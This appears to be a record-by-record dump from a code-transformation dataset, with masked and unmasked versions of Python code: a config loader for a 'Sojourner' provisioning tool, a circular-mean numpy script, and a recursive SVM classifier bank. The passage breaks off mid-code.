"step-3": "<mask token>\n__metaclass__ = type\n<mask token>\n\n\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in ['true', 't', 'y', '1', 'yes']:\n return True\n else:\n return False\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\np = load_config_file()\nactive_user = pwd.getpwuid(os.geteuid())[0]\nDEFAULTS = 'defaults'\nDEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS,\n 'sojourner_home', 'DEFAULT_SOJOURNER_HOME', os.environ['HOME'] +\n '/Sojourner'))\nDEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine',\n 'SOJOURNER_DB_ENGINE', 'sqlite')\nDEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST',\n 'localhost')\nDEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT',\n '3306')\nDEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER',\n 'sojourner')\nDEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd',\n 'SOJOURNER_DB_PASSWD', 'sojourner')\nDEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname',\n 'SOJOURNER_DB_DBNAME', 'sojourner')\nSOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner',\n 'SOJOURNER_PROVISIONER', 'ansible')\nSOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles',\n 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')\nSOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks',\n 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')\n",
"step-4": "from __future__ import absolute_import, division, print_function\n__metaclass__ = type\nimport os\nimport pwd\nimport sys\nfrom string import ascii_letters, digits\nfrom ConfigParser import SafeConfigParser\n\n\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in ['true', 't', 'y', '1', 'yes']:\n return True\n else:\n return False\n\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=\n False, floating=False, islist=False):\n \"\"\" return a configuration variable with casting \"\"\"\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\n\ndef _get_config(p, section, key, env_var, default):\n \"\"\" helper function for get_config \"\"\"\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\n\ndef load_config_file():\n \"\"\" Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner \"\"\"\n p = SafeConfigParser()\n path0 = os.getenv('SOJOURNER_CONFIG', None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + '/sojourner.cfg'\n path2 = os.path.expanduser('~/.sojourner.cfg')\n path3 = '/etc/sojourner/sojourner.cfg'\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print('Error reading config file: \\n{0}'.format(e))\n sys.exit(1)\n return p\n return None\n\n\ndef shell_expand_path(path):\n \"\"\" shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE \"\"\"\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\n\np = load_config_file()\nactive_user = pwd.getpwuid(os.geteuid())[0]\nDEFAULTS = 'defaults'\nDEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS,\n 'sojourner_home', 'DEFAULT_SOJOURNER_HOME', os.environ['HOME'] +\n '/Sojourner'))\nDEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine',\n 'SOJOURNER_DB_ENGINE', 'sqlite')\nDEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST',\n 'localhost')\nDEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT',\n '3306')\nDEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER',\n 'sojourner')\nDEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd',\n 'SOJOURNER_DB_PASSWD', 'sojourner')\nDEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname',\n 'SOJOURNER_DB_DBNAME', 'sojourner')\nSOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner',\n 'SOJOURNER_PROVISIONER', 'ansible')\nSOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles',\n 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')\nSOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks',\n 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')\n",
"step-5": "\n# Make coding more python3-ish\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport os\nimport pwd\nimport sys\n\nfrom string import ascii_letters, digits\nfrom ConfigParser import SafeConfigParser\n\n# copied from utils, avoid circular reference fun :)\ndef mk_boolean(value):\n if value is None:\n return False\n val = str(value)\n if val.lower() in [ \"true\", \"t\", \"y\", \"1\", \"yes\" ]:\n return True\n else:\n return False\n\ndef get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):\n ''' return a configuration variable with casting '''\n value = _get_config(p, section, key, env_var, default)\n if boolean:\n return mk_boolean(value)\n if value and integer:\n return int(value)\n if value and floating:\n return float(value)\n if value and islist:\n return [x.strip() for x in value.split(',')]\n return value\n\ndef _get_config(p, section, key, env_var, default):\n ''' helper function for get_config '''\n if env_var is not None:\n value = os.environ.get(env_var, None)\n if value is not None:\n return value\n if p is not None:\n try:\n return p.get(section, key, raw=True)\n except:\n return default\n return default\n\ndef load_config_file():\n ''' Load Config File order(first found is used): ENV, CWD, HOME, /etc/sojourner '''\n\n p = SafeConfigParser()\n\n path0 = os.getenv(\"SOJOURNER_CONFIG\", None)\n if path0 is not None:\n path0 = os.path.expanduser(path0)\n path1 = os.getcwd() + \"/sojourner.cfg\"\n path2 = os.path.expanduser(\"~/.sojourner.cfg\")\n path3 = \"/etc/sojourner/sojourner.cfg\"\n\n for path in [path0, path1, path2, path3]:\n if path is not None and os.path.exists(path):\n try:\n p.read(path)\n except configparser.Error as e:\n print(\"Error reading config file: \\n{0}\".format(e))\n sys.exit(1)\n return p\n return None\n\ndef shell_expand_path(path):\n ''' shell_expand_path is needed as os.path.expanduser does not work\n when path is None, which is the default for SOJOURNER_PRIVATE_KEY_FILE '''\n if path:\n path = os.path.expanduser(os.path.expandvars(path))\n return path\n\np = load_config_file()\n\nactive_user = pwd.getpwuid(os.geteuid())[0]\n\n# sections in config file\nDEFAULTS='defaults'\n\n# configurable things\n# \t\t\tdef get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):\nDEFAULT_SOJOURNER_HOME = shell_expand_path(get_config(p, DEFAULTS, 'sojourner_home','DEFAULT_SOJOURNER_HOME',os.environ['HOME']+'/Sojourner'))\nDEFAULT_DB_ENGINE = get_config(p, DEFAULTS, 'db_engine', 'SOJOURNER_DB_ENGINE', 'sqlite')\nDEFAULT_DB_HOST = get_config(p, DEFAULTS, 'db_host', 'SOJOURNER_DB_HOST', 'localhost')\nDEFAULT_DB_PORT = get_config(p, DEFAULTS, 'db_port', 'SOJOURNER_DB_PORT', '3306')\nDEFAULT_DB_USER = get_config(p, DEFAULTS, 'db_user', 'SOJOURNER_DB_USER', 'sojourner')\nDEFAULT_DB_PASSWD = get_config(p, DEFAULTS, 'db_passwd', 'SOJOURNER_DB_PASSWD', 'sojourner')\nDEFAULT_DB_DBNAME = get_config(p, DEFAULTS, 'db_dbname', 'SOJOURNER_DB_DBNAME', 'sojourner')\n\n\nSOJOURNER_PROVISIONER = get_config(p, 'sojourner', 'provisioner', 'SOJOURNER_PROVISIONER', 'ansible')\n\n# ANSIBLE RELATED\nSOJOURNER_ANSIBLE_ROLES = get_config(p, 'ansible', 'ansible_roles', 'SOJOURNER_ANSIBLE_ROLES', DEFAULT_SOJOURNER_HOME + 'Ansible_Roles')\n\n# CHEF RELATED\nSOJOURNER_CHEF_COOKBOOKS = get_config(p, 'chef', 'chef_cookbooks', 'SOJOURNER_CHEF_COOKBOOKS', DEFAULT_SOJOURNER_HOME + 'Chef_Cookbooks')\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 11:14:13 2019
@author: dobri
"""
import numpy as np
from astropy.stats import circmean
x = np.multiply(np.pi,[(0,1/4,2/4,3/4,4/4),(1,5/4,6/4,7/4,8/4),(5/4,5/4,5/4,5/4,5/4),(0/5,2/5,4/5,6/5,8/5)])
s = np.shape(x)
phikprime = np.array(x*0, dtype=complex);
phikprimebar = np.zeros((s[1],1), dtype=complex)
phikbar = np.zeros((s[0],1))
rhok = np.zeros((s[0],1))
for j in range(0,len(x)):
for k in range(0,len(x[j,:])):
phikprime[j,k]=np.complex(np.cos(x[j,k]),np.sin(x[j,k]))
phikprimebar[j] = np.sum(phikprime[j,:])/s[1]
phikbar[j] = np.angle(phikprimebar[j])
rhok[j] = np.absolute(phikprimebar[j])
print(phikbar[j],circmean(x[j,:]),rhok[j])
|
normal
|
{
"blob_id": "c35ecad842477fc8501a763f7eb972f6e7fc13e1",
"index": 7525,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor j in range(0, len(x)):\n for k in range(0, len(x[j, :])):\n phikprime[j, k] = np.complex(np.cos(x[j, k]), np.sin(x[j, k]))\n phikprimebar[j] = np.sum(phikprime[j, :]) / s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j], circmean(x[j, :]), rhok[j])\n",
"step-3": "<mask token>\nx = np.multiply(np.pi, [(0, 1 / 4, 2 / 4, 3 / 4, 4 / 4), (1, 5 / 4, 6 / 4, \n 7 / 4, 8 / 4), (5 / 4, 5 / 4, 5 / 4, 5 / 4, 5 / 4), (0 / 5, 2 / 5, 4 / \n 5, 6 / 5, 8 / 5)])\ns = np.shape(x)\nphikprime = np.array(x * 0, dtype=complex)\nphikprimebar = np.zeros((s[1], 1), dtype=complex)\nphikbar = np.zeros((s[0], 1))\nrhok = np.zeros((s[0], 1))\nfor j in range(0, len(x)):\n for k in range(0, len(x[j, :])):\n phikprime[j, k] = np.complex(np.cos(x[j, k]), np.sin(x[j, k]))\n phikprimebar[j] = np.sum(phikprime[j, :]) / s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j], circmean(x[j, :]), rhok[j])\n",
"step-4": "<mask token>\nimport numpy as np\nfrom astropy.stats import circmean\nx = np.multiply(np.pi, [(0, 1 / 4, 2 / 4, 3 / 4, 4 / 4), (1, 5 / 4, 6 / 4, \n 7 / 4, 8 / 4), (5 / 4, 5 / 4, 5 / 4, 5 / 4, 5 / 4), (0 / 5, 2 / 5, 4 / \n 5, 6 / 5, 8 / 5)])\ns = np.shape(x)\nphikprime = np.array(x * 0, dtype=complex)\nphikprimebar = np.zeros((s[1], 1), dtype=complex)\nphikbar = np.zeros((s[0], 1))\nrhok = np.zeros((s[0], 1))\nfor j in range(0, len(x)):\n for k in range(0, len(x[j, :])):\n phikprime[j, k] = np.complex(np.cos(x[j, k]), np.sin(x[j, k]))\n phikprimebar[j] = np.sum(phikprime[j, :]) / s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j], circmean(x[j, :]), rhok[j])\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 1 11:14:13 2019\n\n@author: dobri\n\"\"\"\n\nimport numpy as np\nfrom astropy.stats import circmean\n\nx = np.multiply(np.pi,[(0,1/4,2/4,3/4,4/4),(1,5/4,6/4,7/4,8/4),(5/4,5/4,5/4,5/4,5/4),(0/5,2/5,4/5,6/5,8/5)])\ns = np.shape(x)\n\nphikprime = np.array(x*0, dtype=complex);\nphikprimebar = np.zeros((s[1],1), dtype=complex)\nphikbar = np.zeros((s[0],1))\nrhok = np.zeros((s[0],1))\n \nfor j in range(0,len(x)):\n for k in range(0,len(x[j,:])):\n phikprime[j,k]=np.complex(np.cos(x[j,k]),np.sin(x[j,k]))\n \n phikprimebar[j] = np.sum(phikprime[j,:])/s[1]\n phikbar[j] = np.angle(phikprimebar[j])\n rhok[j] = np.absolute(phikprimebar[j])\n print(phikbar[j],circmean(x[j,:]),rhok[j])",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
""" Version 3 of IRC (Infinite Recursive classifier). Based on the idea that each output is placed in a certain
location.
Let me try to solve a simpler problem first. Let me forget about the gate and do non stop recursive classification
step by step, one bye one.
Update. 19 May 2015. Let me stept this up. Instead of having a fixed width,
Update. 21 May 2015: Split into files, created School.py
#TODO: extending classifier
let me keep expanding the width. Only the
Variable width output for classifier.
Assign any function to a classifier node.
input width is fixed.
# TODO Need a better predictor.
"""
__author__ = 'Abhishek Rao'
# Headers
import numpy as np
from sklearn import svm
import math
import matplotlib.pyplot as plt
import pickle
import os.path
from sklearn.metrics import accuracy_score
import School
# Constants
# Classes
class ClassifierNode:
""" A node that contains classifier, it's input address and output address.
"""
def __init__(self, end_in_address, out_address, classifier_name='Default',
given_predictor=None):
self.out_address = out_address
self.end_in_address = end_in_address # end column
self.label = classifier_name # The name of this concept. e.g. like apple etc.
# Check whether to create a standard classifier or a custom, given one.
if given_predictor:
self.given_predictor = given_predictor
self.classifier_type = 'custom'
else:
self.classifier = svm.LinearSVC(dual=False, penalty='l1')
self.classifier_type = 'standard'
def fit(self, x_in, y):
new_x_in = x_in[:, :self.end_in_address]
self.classifier.fit(new_x_in, y)
def predict(self, x_in):
"""
Give output for the current classifier. Note instead of predict 1,0, better to use probability, soft prediction.
:param x_in: The Classifier banks working memory, full matrix_in.
:return: A column of predicted values.
"""
new_x_in = x_in[:, :self.end_in_address]
if self.classifier_type == 'standard':
dec_fx_in = self.classifier.decision_function(new_x_in)
else:
dec_fx_in = self.given_predictor(new_x_in)
# Convert it into mapping between 0 to 1 instead of -1 to 1
return np.array([sigmoid_10(i) for i in dec_fx_in])
class SimpleClassifierBank:
""" A machine which stores both input X and the current output of bunch of classifiers.
API should be similar to scikit learn"""
def __init__(self, max_width, input_width, height):
"""
Initialize this class.
:rtype : object self
:param max_width: maximum data dimension in current working memory, should be greater than
input_width.
:param input_width: maximum input dimension.
:param height: maximum number of input samples
:return: None
"""
self.current_working_memory = np.zeros([height, max_width])
self.classifiers_out_address_start = input_width # the start of classifiers output.
self.classifiers_current_count = 0 # starting address for output for new classifier
self.classifiers_list = []
def predict(self, x_pred):
"""Give out what it thinks from the input. Input x_pred should be 2 dimensional.
:param: x_pred: input, dimension 2, (samples x_pred dimension)"""
self.current_working_memory *= 0 # Flush the current input
x_pred = np.array(x_pred)
input_number_samples, input_feature_dimension = x_pred.shape
if len(x_pred.shape) is not 2:
print "Error in predict. Input dimension should be 2"
raise ValueError
self.current_working_memory[:input_number_samples, :input_feature_dimension] = x_pred
for classifier_i in self.classifiers_list:
predicted_value = classifier_i.predict(self.current_working_memory)
predicted_shape = predicted_value.shape
if len(predicted_shape) < 2:
predicted_value = predicted_value.reshape(-1, 1)
predicted_shape = predicted_value.shape
self.current_working_memory[:predicted_shape[0], classifier_i.out_address] = predicted_value
# need to return the rightmost nonzero column.
for column_j in range(self.current_working_memory.shape[1])[::-1]: # reverse traverse through columns
if np.any(self.current_working_memory[:input_number_samples, column_j]):
soft_dec = self.current_working_memory[:input_number_samples, column_j]
return np.array(soft_dec > 0.5, dtype=np.int16)
print 'Cant find any nonzero column'
return self.current_working_memory[:, 0]
def fit(self, x_in, y, task_name='Default'):
"""
Adds a new classifier and trains it, similar to Scikit API
:param x_in: 2d Input data
:param y: labels
:return: None
"""
# check for limit reach for number of classifiers.
if self.classifiers_current_count + self.classifiers_out_address_start \
> self.current_working_memory.shape[1]:
print 'No more space for classifier. ERROR'
raise MemoryError
x_in = np.array(x_in)
input_number_samples, input_feature_dimension = x_in.shape
if len(x_in.shape) is not 2:
print "Error in predict. Input dimension should be 2"
raise ValueError
self.current_working_memory[:x_in.shape[0], :x_in.shape[1]] = x_in
# Procure a new classifier, this might be wasteful, later perhaps reuse classifier
# instead of lavishly getting new ones, chinese restaurant?
new_classifier = ClassifierNode(
end_in_address=self.classifiers_out_address_start + self.classifiers_current_count,
out_address=[self.classifiers_out_address_start + self.classifiers_current_count + 1],
classifier_name=task_name)
self.classifiers_current_count += 1
# Need to take care of mismatch in length of working memory and input samples.
new_classifier.fit(self.current_working_memory[:input_number_samples], y)
self.classifiers_list.append(new_classifier)
def fit_custom_fx(self, custom_function, input_width, output_width, task_name):
"""
Push in a new custom function to classifiers list.
:param custom_function: The function that will be used to predict. Should take in a 2D array input and
give out a 2d array of same height and variable width.
:param input_width: The width of input.
:param output_width: The width of output. If a single neuron this is one.
:param task_name: name of this function
:return: None
"""
new_classifier = ClassifierNode(
end_in_address=input_width,
out_address=self.classifiers_out_address_start + self.classifiers_current_count + np.arange(output_width),
classifier_name=task_name,
given_predictor=custom_function
)
self.classifiers_current_count += output_width
self.classifiers_list.append(new_classifier)
def status(self):
"""Gives out the current status, like number of classifier and prints their values"""
print 'Currently there are ', len(self.classifiers_list), ' classifiers. They are'
classifiers_coefficients = np.zeros(self.current_working_memory.shape)
print [classifier_i.label for classifier_i in self.classifiers_list]
for count, classifier_i in enumerate(self.classifiers_list):
coeffs_i = classifier_i.classifier.coef_ \
if classifier_i.classifier_type == 'standard' else np.zeros([1, 1])
classifiers_coefficients[count, :coeffs_i.shape[1]] = coeffs_i
# print 'Classifier: ', classifier_i
# print 'Classifier name: ', classifier_i.label
# print 'Out address', classifier_i.out_address
# print 'In address', classifier_i.end_in_address
# print 'Coefficients: ', classifier_i.classifier.coef_, classifier_i.classifier.intercept_
plt.imshow(self.current_working_memory, interpolation='none', cmap='gray')
plt.title('Current working memory')
plt.figure()
plt.imshow(classifiers_coefficients, interpolation='none', cmap='gray')
plt.title('Classifier coefficients')
plt.show()
def remove_classifier(self, classifier_name):
"""
Removes the classifier whose name is same as classifier_name
:param classifier_name: the label of the classifier to be removed.
:return: the index of removed classifier. -1 if not found.
"""
try:
labels_list = [classifier_i.label for classifier_i in self.classifiers_list]
except ValueError:
print 'The specified label does not exist.'
return -1
removing_index = labels_list.index(classifier_name)
self.classifiers_list.pop(removing_index)
print 'Classifier was removed. Its nae was', classifier_name
return removing_index
def score(self, x_in, y):
"""
Gives the accuracy between predicted( x_in) and y
:param x_in: 2d matrix, samples x_in dimension
:param y: actual label
:return: float, between 0 to 1
"""
yp_score = self.predict(x_in)
return accuracy_score(y, y_pred=yp_score)
def generic_task(self, x_in, y, task_name):
"""
A generic framework to train on different tasks.
"""
self.fit(x_in, y, task_name=task_name)
print 'The score for task ', task_name, ' is ', self.score(x_in, y)
# Global functions
# Reason for having 10 sigmoid is to get sharper distinction.
def sigmoid_10(x):
return 1 / (1 + math.exp(-10*x))
# Following are required for custom functions Task 1,2
def meanie(x):
return np.mean(x, axis=1)
def dot_with_11(x):
return np.dot(x, np.array([0.5, 0.5]))
if __name__ == '__main__':
learning_phase = False
classifier_file_name = 'ClassifierFile.pkl'
if os.path.isfile(classifier_file_name):
Main_C1 = pickle.load(open(classifier_file_name, 'r'))
else:
Main_C1 = SimpleClassifierBank(max_width=2000, input_width=1500, height=500)
# Learn or not learn?
if learning_phase:
School.class_digital_logic(Main_C1)
School.simple_custom_fitting_class(Main_C1)
# Main_C1.fit_custom_fx(np.mean,input_width=1500, output_width=1, task_name='np.mean')
yp = Main_C1.predict(np.random.randn(8, 22))
print 'Predicted value is ', yp
# Main_C1.remove_classifier('np.mean')
Main_C1.status()
pickle.dump(Main_C1, open(classifier_file_name, 'w'))
|
normal
|
{
"blob_id": "eb043c4c981b48763164e3d060fd52f5032be0ea",
"index": 8996,
"step-1": "\"\"\" Version 3 of IRC (Infinite Recursive classifier). Based on the idea that each output is placed in a certain\nlocation.\nLet me try to solve a simpler problem first. Let me forget about the gate and do non stop recursive classification\nstep by step, one bye one.\n\nUpdate. 19 May 2015. Let me stept this up. Instead of having a fixed width,\n\nUpdate. 21 May 2015: Split into files, created School.py\n\n#TODO: extending classifier\n let me keep expanding the width. Only the\n Variable width output for classifier.\n Assign any function to a classifier node.\ninput width is fixed.\n# TODO Need a better predictor.\n\"\"\"\n\n__author__ = 'Abhishek Rao'\n\n\n# Headers\nimport numpy as np\nfrom sklearn import svm\nimport math\nimport matplotlib.pyplot as plt\nimport pickle\nimport os.path\nfrom sklearn.metrics import accuracy_score\nimport School\n\n\n# Constants\n\n\n# Classes\nclass ClassifierNode:\n \"\"\" A node that contains classifier, it's input address and output address.\n \"\"\"\n\n def __init__(self, end_in_address, out_address, classifier_name='Default',\n given_predictor=None):\n self.out_address = out_address\n self.end_in_address = end_in_address # end column\n self.label = classifier_name # The name of this concept. e.g. like apple etc.\n # Check whether to create a standard classifier or a custom, given one.\n if given_predictor:\n self.given_predictor = given_predictor\n self.classifier_type = 'custom'\n else:\n self.classifier = svm.LinearSVC(dual=False, penalty='l1')\n self.classifier_type = 'standard'\n\n def fit(self, x_in, y):\n new_x_in = x_in[:, :self.end_in_address]\n self.classifier.fit(new_x_in, y)\n\n def predict(self, x_in):\n \"\"\"\n Give output for the current classifier. Note instead of predict 1,0, better to use probability, soft prediction.\n :param x_in: The Classifier banks working memory, full matrix_in.\n :return: A column of predicted values.\n \"\"\"\n new_x_in = x_in[:, :self.end_in_address]\n if self.classifier_type == 'standard':\n dec_fx_in = self.classifier.decision_function(new_x_in)\n else:\n dec_fx_in = self.given_predictor(new_x_in)\n # Convert it into mapping between 0 to 1 instead of -1 to 1\n return np.array([sigmoid_10(i) for i in dec_fx_in])\n\n\nclass SimpleClassifierBank:\n \"\"\" A machine which stores both input X and the current output of bunch of classifiers.\n API should be similar to scikit learn\"\"\"\n\n def __init__(self, max_width, input_width, height):\n \"\"\"\n Initialize this class.\n\n :rtype : object self\n :param max_width: maximum data dimension in current working memory, should be greater than\n input_width.\n :param input_width: maximum input dimension.\n :param height: maximum number of input samples\n :return: None\n \"\"\"\n self.current_working_memory = np.zeros([height, max_width])\n self.classifiers_out_address_start = input_width # the start of classifiers output.\n self.classifiers_current_count = 0 # starting address for output for new classifier\n self.classifiers_list = []\n\n def predict(self, x_pred):\n \"\"\"Give out what it thinks from the input. Input x_pred should be 2 dimensional.\n\n :param: x_pred: input, dimension 2, (samples x_pred dimension)\"\"\"\n self.current_working_memory *= 0 # Flush the current input\n x_pred = np.array(x_pred)\n input_number_samples, input_feature_dimension = x_pred.shape\n if len(x_pred.shape) is not 2:\n print \"Error in predict. Input dimension should be 2\"\n raise ValueError\n self.current_working_memory[:input_number_samples, :input_feature_dimension] = x_pred\n for classifier_i in self.classifiers_list:\n predicted_value = classifier_i.predict(self.current_working_memory)\n predicted_shape = predicted_value.shape\n if len(predicted_shape) < 2:\n predicted_value = predicted_value.reshape(-1, 1)\n predicted_shape = predicted_value.shape\n self.current_working_memory[:predicted_shape[0], classifier_i.out_address] = predicted_value\n # need to return the rightmost nonzero column.\n for column_j in range(self.current_working_memory.shape[1])[::-1]: # reverse traverse through columns\n if np.any(self.current_working_memory[:input_number_samples, column_j]):\n soft_dec = self.current_working_memory[:input_number_samples, column_j]\n return np.array(soft_dec > 0.5, dtype=np.int16)\n print 'Cant find any nonzero column'\n return self.current_working_memory[:, 0]\n\n def fit(self, x_in, y, task_name='Default'):\n \"\"\"\n Adds a new classifier and trains it, similar to Scikit API\n\n :param x_in: 2d Input data\n :param y: labels\n :return: None\n \"\"\"\n # check for limit reach for number of classifiers.\n if self.classifiers_current_count + self.classifiers_out_address_start \\\n > self.current_working_memory.shape[1]:\n print 'No more space for classifier. ERROR'\n raise MemoryError\n x_in = np.array(x_in)\n input_number_samples, input_feature_dimension = x_in.shape\n if len(x_in.shape) is not 2:\n print \"Error in predict. Input dimension should be 2\"\n raise ValueError\n self.current_working_memory[:x_in.shape[0], :x_in.shape[1]] = x_in\n # Procure a new classifier, this might be wasteful, later perhaps reuse classifier\n # instead of lavishly getting new ones, chinese restaurant?\n new_classifier = ClassifierNode(\n end_in_address=self.classifiers_out_address_start + self.classifiers_current_count,\n out_address=[self.classifiers_out_address_start + self.classifiers_current_count + 1],\n classifier_name=task_name)\n self.classifiers_current_count += 1\n # Need to take care of mismatch in length of working memory and input samples.\n new_classifier.fit(self.current_working_memory[:input_number_samples], y)\n self.classifiers_list.append(new_classifier)\n\n def fit_custom_fx(self, custom_function, input_width, output_width, task_name):\n \"\"\"\n Push in a new custom function to classifiers list.\n :param custom_function: The function that will be used to predict. Should take in a 2D array input and\n give out a 2d array of same height and variable width.\n :param input_width: The width of input.\n :param output_width: The width of output. If a single neuron this is one.\n :param task_name: name of this function\n :return: None\n \"\"\"\n new_classifier = ClassifierNode(\n end_in_address=input_width,\n out_address=self.classifiers_out_address_start + self.classifiers_current_count + np.arange(output_width),\n classifier_name=task_name,\n given_predictor=custom_function\n )\n self.classifiers_current_count += output_width\n self.classifiers_list.append(new_classifier)\n\n def status(self):\n \"\"\"Gives out the current status, like number of classifier and prints their values\"\"\"\n print 'Currently there are ', len(self.classifiers_list), ' classifiers. They are'\n classifiers_coefficients = np.zeros(self.current_working_memory.shape)\n print [classifier_i.label for classifier_i in self.classifiers_list]\n for count, classifier_i in enumerate(self.classifiers_list):\n coeffs_i = classifier_i.classifier.coef_ \\\n if classifier_i.classifier_type == 'standard' else np.zeros([1, 1])\n classifiers_coefficients[count, :coeffs_i.shape[1]] = coeffs_i\n # print 'Classifier: ', classifier_i\n # print 'Classifier name: ', classifier_i.label\n # print 'Out address', classifier_i.out_address\n # print 'In address', classifier_i.end_in_address\n # print 'Coefficients: ', classifier_i.classifier.coef_, classifier_i.classifier.intercept_\n plt.imshow(self.current_working_memory, interpolation='none', cmap='gray')\n plt.title('Current working memory')\n plt.figure()\n plt.imshow(classifiers_coefficients, interpolation='none', cmap='gray')\n plt.title('Classifier coefficients')\n plt.show()\n\n def remove_classifier(self, classifier_name):\n \"\"\"\n Removes the classifier whose name is same as classifier_name\n :param classifier_name: the label of the classifier to be removed.\n :return: the index of removed classifier. -1 if not found.\n \"\"\"\n try:\n labels_list = [classifier_i.label for classifier_i in self.classifiers_list]\n except ValueError:\n print 'The specified label does not exist.'\n return -1\n removing_index = labels_list.index(classifier_name)\n self.classifiers_list.pop(removing_index)\n print 'Classifier was removed. Its nae was', classifier_name\n return removing_index\n\n def score(self, x_in, y):\n \"\"\"\n Gives the accuracy between predicted( x_in) and y\n :param x_in: 2d matrix, samples x_in dimension\n :param y: actual label\n :return: float, between 0 to 1\n \"\"\"\n yp_score = self.predict(x_in)\n return accuracy_score(y, y_pred=yp_score)\n\n def generic_task(self, x_in, y, task_name):\n \"\"\"\n A generic framework to train on different tasks.\n \"\"\"\n self.fit(x_in, y, task_name=task_name)\n print 'The score for task ', task_name, ' is ', self.score(x_in, y)\n\n\n# Global functions\n# Reason for having 10 sigmoid is to get sharper distinction.\ndef sigmoid_10(x):\n return 1 / (1 + math.exp(-10*x))\n\n\n# Following are required for custom functions Task 1,2\ndef meanie(x):\n return np.mean(x, axis=1)\n\n\ndef dot_with_11(x):\n return np.dot(x, np.array([0.5, 0.5]))\n\n\nif __name__ == '__main__':\n learning_phase = False\n classifier_file_name = 'ClassifierFile.pkl'\n if os.path.isfile(classifier_file_name):\n Main_C1 = pickle.load(open(classifier_file_name, 'r'))\n else:\n Main_C1 = SimpleClassifierBank(max_width=2000, input_width=1500, height=500)\n # Learn or not learn?\n if 